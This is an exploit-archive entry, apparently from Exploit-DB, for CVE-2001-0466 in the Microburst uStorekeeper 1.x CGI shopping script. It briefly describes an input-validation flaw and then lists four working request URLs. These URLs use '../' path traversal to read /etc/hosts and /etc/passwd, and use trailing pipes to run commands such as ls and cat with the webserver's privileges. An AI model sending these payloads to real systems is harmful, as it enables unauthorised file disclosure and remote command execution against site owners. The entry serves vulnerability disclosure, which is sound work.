Microburst uStorekeeper 1.x - Arbitrary Commands
Author: UkR hacking team
type: remote
platform: cgi
port:
date_added: 2001-04-02
date_updated: 2012-08-22
verified: 1
codes: CVE-2001-0466;OSVDB-534
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/2536/info
A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies.
The script fails to properly validate user-supplied input, allowing remote users to submit URLs containing '/../' sequences and arbitrary filenames or commands, which will be executed or displayed with the privilege level of the webserver user.
This permits the remote user to request files and execute commands from arbitrary locations on the host filesystem, outside the script's normal directory scope.
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
./../../../../bin/cat%20ustorekeeper.pl|